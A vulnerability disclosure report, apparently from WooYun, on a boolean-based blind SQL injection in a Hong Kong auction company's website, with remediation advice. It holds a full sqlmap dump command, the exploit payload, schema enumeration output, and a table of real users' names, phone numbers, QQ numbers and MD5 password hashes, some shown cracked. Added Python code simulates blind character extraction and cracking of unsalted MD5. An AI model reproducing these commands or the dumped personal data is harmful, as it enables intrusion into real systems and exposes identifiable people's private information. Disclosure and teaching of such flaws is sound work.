Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0157396

Title: SQL injection in the website of 中銀通國際拍賣有限公司 (user passwords, phone numbers, QQ numbers and real names leaked) (Hong Kong)

Vendor: 中銀通國際拍賣有限公司

Author: 路人甲

Submitted: 2015-12-01 19:04

Fix time: 2016-01-17 11:36

Published: 2016-01-17 11:36

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed to a third-party partner (hkcert, Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-12-01: details sent to the vendor, awaiting the vendor's handling
2015-12-03: vendor confirmed; details visible to the vendor only
2015-12-13: details opened to core white hats and domain experts
2015-12-23: details opened to regular white hats
2016-01-02: details opened to intern white hats
2016-01-17: details opened to the public

Summary:

中銀通國際拍賣有限公司 is an auction group dealing in artworks internationally. It was founded in 2012 and is headquartered in 裕成商业大厦 on Queen Victoria Street (域多利皇后街), in the central part of Hong Kong Island...

Details:

Target: http://**.**.**.**/ActionAllResult.aspx?MagazineId=105

The MagazineId GET parameter is injectable (boolean-based blind, so nothing from the database is ever echoed; the attacker only sees whether the page renders results or not). sqlmap dumps the Users table of the YinTongDB database with:

$ python sqlmap.py -u "http://**.**.**.**/ActionAllResult.aspx?MagazineId=105" -p MagazineId --technique=B --random-agent --batch  -D YinTongDB -T dbo.Users -C UserName,UserId,TelPhone,QQ,Pwd,Name --dump


Database: YinTongDB
Table: Users
[8 entries]
+----------------+--------+----------------+------------+---------------------------------------------------+-------------+
| UserName | UserId | TelPhone | QQ | Pwd | Name |
+----------------+--------+----------------+------------+---------------------------------------------------+-------------+
| osai | 1001 | 96267761 | <blank> | 0773679b3cd1a711cce49f82ceb89958 | LO SAI KING |
| ckh0402 | 1006 | 04-24735028 | <blank> | 0fc7291c073a80d86604ed57a76f12c9 | 陳坤鴻 |
| xsfwy | 1000 | 11111 | 12433 | 1308d20659585a8a661a0b4cbd96bf4e | aa |
| 木瓜 | 1003 | 0552-3029228 | 598174169 | 4608c58ae799e3def53e4834cfaaae66 | 李华明 |
| wangchao | 1005 | 0374-2620861 | 344050905 | 7e72fb27fc800c6e906557baee4ed1dc (wangchao) | 王超 |
| huaidanxiaomao | 1004 | 0373-12345678 | 244647611 | 94ff8acddc9359873d3e78a482b1ccb8 (huaidanxiaomao) | 毛咏 |
| 嚴三泰 | 1002 | 886-0972878867 | 2805669943 | d3e6d39e48e89b0c26702956886adfdf | 嚴三泰 |
| CHEN543216 | 1007 | <blank> | 1992714542 | f01136bef49a54a38f472f4879929ea6 | 陳證極 |
+----------------+--------+----------------+------------+---------------------------------------------------+-------------+
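To show how a dump like the one above is obtained from a page that never echoes database content, here is an added, self-contained simulation of the boolean-based blind technique sqlmap used (its payload in the proof section is `MagazineId=105 AND 1968=1968`). This is not code from the report or from the affected site: it assumes ActionAllResult.aspx concatenates MagazineId into its WHERE clause, and it uses an in-memory SQLite database with constructed rows in place of the real SQL Server 2005 backend (SQLite's substr() stands in for SQL Server's SUBSTRING()). The hardened handler beside it is the fix the advisory's remediation should call for.

```python
"""Boolean-based blind SQL injection against the MagazineId parameter, simulated.

Added example; not code from the WooYun report or the affected ASP.NET site.
Assumptions: the page concatenates MagazineId into SQL, and an in-memory
SQLite database with constructed rows stands in for SQL Server 2005.
"""
import sqlite3
import string

# Candidate characters tried at each position; extend for other charsets.
ALPHABET = string.ascii_lowercase + string.digits + "_"


def build_db():
    """Constructed stand-in for YinTongDB: one Magazine row and one Users row."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE Magazine (MagazineId INTEGER, Title TEXT);
        CREATE TABLE Users (UserId INTEGER, UserName TEXT, Pwd TEXT);
        INSERT INTO Magazine VALUES (105, 'Autumn sale');
        INSERT INTO Users VALUES (1000, 'xsfwy', 'deadbeef');
        """
    )
    return db


def vulnerable_page(db, magazine_id):
    """The bug: the raw GET value is pasted into the query.
    Returns True when the page would show results, False when it would be
    empty; that visible difference is the only channel the attacker needs."""
    sql = "SELECT Title FROM Magazine WHERE MagazineId=" + magazine_id
    return db.execute(sql).fetchone() is not None


def hardened_page(db, magazine_id):
    """The fix: enforce the integer type, then bind the value as a parameter."""
    try:
        mid = int(magazine_id)
    except ValueError:
        return False  # reject anything that is not a plain integer
    row = db.execute("SELECT Title FROM Magazine WHERE MagazineId=?", (mid,)).fetchone()
    return row is not None


def injectable(page):
    """sqlmap's boolean check: the plain value works, a true tautology still
    works, and a false tautology changes the response."""
    return (page("105")
            and page("105 AND 1968=1968")
            and not page("105 AND 1968=1969"))


def blind_extract(page, subquery, max_len=32):
    """Recover the result of `subquery` one character at a time using only
    the page's true/false behaviour; --dump does this for every cell."""
    result = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            payload = f"105 AND substr(({subquery}),{pos},1)='{ch}'"
            if page(payload):
                result += ch
                break
        else:
            break  # no candidate matched: end of string, or not injectable
    return result


if __name__ == "__main__":
    db = build_db()
    vuln = lambda p: vulnerable_page(db, p)
    safe = lambda p: hardened_page(db, p)
    print("vulnerable page injectable:", injectable(vuln))  # True
    print("hardened page injectable:", injectable(safe))    # False
    print("extracted:", blind_extract(vuln, "SELECT UserName FROM Users WHERE UserId=1000"))  # xsfwy
```

Each recovered character costs up to len(ALPHABET) requests, which is why the real dump needed only a boolean oracle and patience; the `--technique=B` flag in the command above restricts sqlmap to exactly this method.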

Proof of vulnerability:

---
Parameter: MagazineId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: MagazineId=105 AND 1968=1968
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
current user: 'waiyintong'
current user is DBA: False
database management system users [2]:
[*] sa
[*] waiyintong
Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 67941 |
| sys.sysmessages | 67941 |
| sys.syscolumns | 10642 |
| sys.all_parameters | 6697 |
| sys.system_parameters | 6697 |
| sys.trace_subclass_values | 4722 |
| sys.trace_event_bindings | 3958 |
| sys.all_columns | 3740 |
| sys.system_columns | 3696 |
| sys.syscomments | 2744 |
| dbo.spt_values | 2346 |
| sys.all_objects | 1747 |
| sys.sysobjects | 1747 |
| sys.system_objects | 1741 |
| sys.database_permissions | 1641 |
| sys.syspermissions | 1641 |
| sys.sysprotects | 1640 |
| sys.all_sql_modules | 1589 |
| sys.system_sql_modules | 1589 |
| sys.all_views | 284 |
| sys.system_views | 284 |
| sys.event_notification_event_types | 193 |
| sys.trace_events | 171 |
| sys.syscharsets | 114 |
| sys.allocation_units | 112 |
| sys.dm_db_partition_stats | 101 |
| sys.partitions | 101 |
| sys.system_components_surface_area_configuration | 98 |
| sys.xml_schema_facets | 97 |
| sys.xml_schema_components | 93 |
| sys.xml_schema_types | 77 |
| sys.trace_columns | 65 |
| sys.configurations | 62 |
| sys.sysconfigures | 62 |
| sys.syscurconfigs | 62 |
| sys.fulltext_document_types | 50 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 |
| INFORMATION_SCHEMA.COLUMNS | 44 |
| sys.columns | 44 |
| sys.syslanguages | 33 |
| sys.systypes | 27 |
| sys.types | 27 |
| sys.securable_classes | 21 |
| sys.trace_categories | 21 |
| INFORMATION_SCHEMA.SCHEMATA | 17 |
| sys.fulltext_languages | 17 |
| sys.schemas | 17 |
| sys.xml_schema_component_placements | 17 |
| sys.database_principals | 14 |
| sys.master_files | 14 |
| sys.sysusers | 14 |
| sys.xml_schema_attributes | 14 |
| sys.server_principals | 11 |
| sys.service_contract_message_usages | 11 |
| sys.database_mirroring | 7 |
| sys.database_recovery_status | 7 |
| sys.databases | 7 |
| sys.server_permissions | 7 |
| sys.sysdatabases | 7 |
| sys.sysindexes | 7 |
| sys.indexes | 6 |
| sys.objects | 6 |
| sys.stats_columns | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| INFORMATION_SCHEMA.TABLES | 5 |
| sys.index_columns | 5 |
| sys.sysindexkeys | 5 |
| sys.tables | 5 |
| sys.endpoints | 4 |
| sys.login_token | 3 |
| sys.service_queue_usages | 3 |
| sys.stats | 3 |
| sys.syssegments | 3 |
| sys.xml_schema_namespaces | 3 |
| sys.database_files | 2 |
| sys.server_role_members | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_logins | 2 |
| sys.sysfiles | 2 |
| sys.syslogins | 2 |
| sys.user_token | 2 |
| dbo.spt_monitor | 1 |
| sys.data_spaces | 1 |
| sys.database_role_members | 1 |
| sys.default_constraints | 1 |
| sys.dm_exec_requests | 1 |
| sys.dm_exec_sessions | 1 |
| sys.filegroups | 1 |
| sys.servers | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.sysmembers | 1 |
| sys.sysprocesses | 1 |
| sys.sysservers | 1 |
| sys.tcp_endpoints | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+
Database: YinTongDB
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.Auction | 55294 |
| dbo.Magazine | 37 |
| dbo.Users | 8 |
| dbo.Admins | 2 |
| dbo.News | 2 |
| dbo.AuctionYG | 1 |
| dbo.Topic | 1 |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile | 22 |
| dbo.backupmediafamily | 11 |
| dbo.backupmediaset | 11 |
| dbo.backupset | 11 |
| dbo.restorefile | 2 |
| dbo.restorefilegroup | 1 |
| dbo.restorehistory | 1 |
+--------------------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: MagazineId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: MagazineId=105 AND 1968=1968
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: YinTongDB
Table: Auction
[22 columns]
+---------------------+---------+
| Column | Type |
+---------------------+---------+
| AuctionDescription | varchar |
| AuctionId | varchar |
| AuctionIntroduction | varchar |
| AuctionName | varchar |
| Author | varchar |
| CaiZhi | varchar |
| ChengJiao | varchar |
| Id | int |
| LingYin | varchar |
| MagazineId | int |
| PhotoIMG | image |
| PhotoPath | text |
| QiPaiPrice | varchar |
| Reserve1 | varchar |
| Reserve2 | varchar |
| Reserve3 | varchar |
| Reserve4 | varchar |
| Reserve5 | varchar |
| Size | varchar |
| TiShi | varchar |
| YuGuPrice | varchar |
| ZhuangBiao | varchar |
+---------------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: MagazineId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: MagazineId=105 AND 1968=1968
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: YinTongDB
Table: Users
[25 columns]
+-------------+---------------+
| Column | Type |
+-------------+---------------+
| Birthday | smalldatetime |
| CellPhone | nvarchar |
| CreateTime | smalldatetime |
| Email | nvarchar |
| FaceBook | nvarchar |
| Gender | char |
| Grade | int |
| Integration | int |
| limit | int |
| Name | nvarchar |
| Pwd | nvarchar |
| QQ | nvarchar |
| Reserve1 | varchar |
| Reserve2 | varchar |
| Reserve3 | varchar |
| Reserve4 | varchar |
| Reserve5 | varchar |
| TelPhone | nvarchar |
| UserAddress | nvarchar |
| UserId | int |
| UserImg | image |
| UserImgPath | text |
| UserName | nvarchar |
| UserStatus | int |
| WChar | nvarchar |
+-------------+---------------+

Remediation:

Deploy a WAF. Note that a WAF only raises the cost of exploitation; the root cause is that MagazineId is concatenated into the query. Cast the parameter to an integer and bind it as a parameter in the ASP.NET code, run the site under a database login that can read only YinTongDB rather than one that can enumerate master and msdb (the current user 'waiyintong' is not a DBA, yet the proof above lists both), and replace the 32-character unsalted hashes in Users.Pwd, two of which sqlmap cracked straight back to the user name, with a salted, iterated password hash.
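The dumped Pwd column holds 32-hex-character values that sqlmap annotated with the matching user name, the signature of unsalted MD5 with the password equal to the login. The following added example (not code from the report or the site; its user records are constructed, not the dumped data) shows why such hashes fall to a username-as-password guess in one hash operation each, and the salted PBKDF2 storage that the remediation should replace them with.

```python
"""Why the dumped Pwd column fell to a dictionary attack, and the fix.

Added example; not code from the WooYun report or the affected site.
SAMPLE_USERS is constructed to mirror the shape of the dumped Users table.
"""
import hashlib
import hmac
import os


def md5_hex(s):
    return hashlib.md5(s.encode("utf-8")).hexdigest()


# Constructed records: (UserName, Pwd) with unsalted MD5, as in the dump.
SAMPLE_USERS = [
    ("alice", md5_hex("alice")),       # password equals the user name
    ("bob", md5_hex("123456")),        # common password
    ("carol", md5_hex("Kq9!vZ2#pL")),  # not in any small wordlist
]

# Tiny stand-in for sqlmap's wordlist.
COMMON = ["123456", "password", "111111", "admin"]


def looks_like_md5(value):
    """32 hex characters: the shape of every Pwd value in the dump."""
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value.lower())


def crack_unsalted_md5(records, wordlist=COMMON):
    """Return {UserName: password} for every hash matched by a guess.
    Candidates are the user name itself plus a short common-password list.
    No salt means one md5() per guess, and guesses can be precomputed once
    for every account in the table."""
    cracked = {}
    for user, h in records:
        if not looks_like_md5(h):
            continue
        for guess in [user] + list(wordlist):
            if md5_hex(guess) == h.lower():
                cracked[user] = guess
                break
    return cracked


def hash_password(password, iterations=600_000, salt=None):
    """Salted, iterated hash: a fresh 16-byte salt per user, so identical
    passwords get different hashes and precomputed tables are useless."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print(crack_unsalted_md5(SAMPLE_USERS))  # {'alice': 'alice', 'bob': '123456'}
    stored = hash_password("alice")
    print(stored)
    print(verify_password("alice", stored), verify_password("Alice", stored))  # True False
```

Migrating an existing table is done lazily: keep the old MD5 value until the user next logs in successfully, then rehash the submitted password with `hash_password` and overwrite the column, so no plaintext is ever needed on the server side.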

Copyright notice: when reposting, credit the source as 路人甲@乌云


Vendor response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-12-03 11:34

Vendor reply:

Referred to related parties.

Latest status:

None yet